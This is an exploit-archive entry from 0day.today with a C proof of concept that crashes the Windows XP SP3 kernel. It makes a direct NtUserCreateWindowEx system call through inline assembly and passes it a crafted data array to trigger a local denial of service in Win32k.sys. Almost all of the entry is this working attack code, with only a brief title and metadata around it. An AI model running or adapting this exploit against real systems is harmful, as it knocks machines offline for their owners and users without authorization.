Microsoft Windows xp Win32k.sys Local Kernel DoS

2012-05-02T00:00:00
ID 1337DAY-ID-18177
Type zdt
Reporter Lufeng Li
Modified 2012-05-02T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            ////////////////////////////////////////////////////////////////////////////
//
// Title: Microsoft Windows xp Win32k.sys Local Kernel DoS Vulnerability
// Author: Lufeng Li of Neusoft Corporation
// Vendor: www.microsoft.com
// Vulnerable: Windows xp sp3(full patch)
//
/////////////////////////////////////////////////////////////////////////////
 
#include <Windows.h>
#include <stdio.h>
 
void NtUserCreateWindowEx(HANDLE d1,int d2,int d3)
{
    _asm{
        xor eax,eax
        push eax
        push eax
            push eax
            push eax
            push eax
            push eax
            push eax
        push eax
        push eax
            push eax
            push eax
            push eax
            push d3
            push d2
        push d1
        push eax
        mov eax,0x1157
        mov edx,7FFE0300h
        call  dword ptr[edx]
        ret 0x3c
    }
}
void main()
{
    UINT i=0;
    UINT c[]={ 
 0x00000000,0x28001500,0xff7c98cc,0x23ffffff
,0x167c98cc,0x007c98fb,0x02001500,0x78010000
,0x00000000,0x00001500,0x00000000,0x00001500
,0x00000000,0x00001500,0x00000000,0x00000000
,0x00000000,0x00000000,0x34000000,0x3cc00000
,0x5c0007fb,0x617c92f6,0x347c92f6,0x00c00000
,0x00000000,0x18000000,0x000007fb,0xf8000000
,0x200007fd,0x347c92e9,0x02c00000,0x4c000000
    };
        HWND _wnd = CreateWindowEx(WS_EX_TOPMOST,
                                "magic",
                                "magic",
                                WS_POPUP,
                                100,
                                100,
                                100,
                                100,
                                0,
                                0,
                                GetModuleHandle( 0 ),
                                0);
    NtUserCreateWindowEx(_wnd,0x26,(UINT)c);
}



#  0day.today [2018-03-19]  #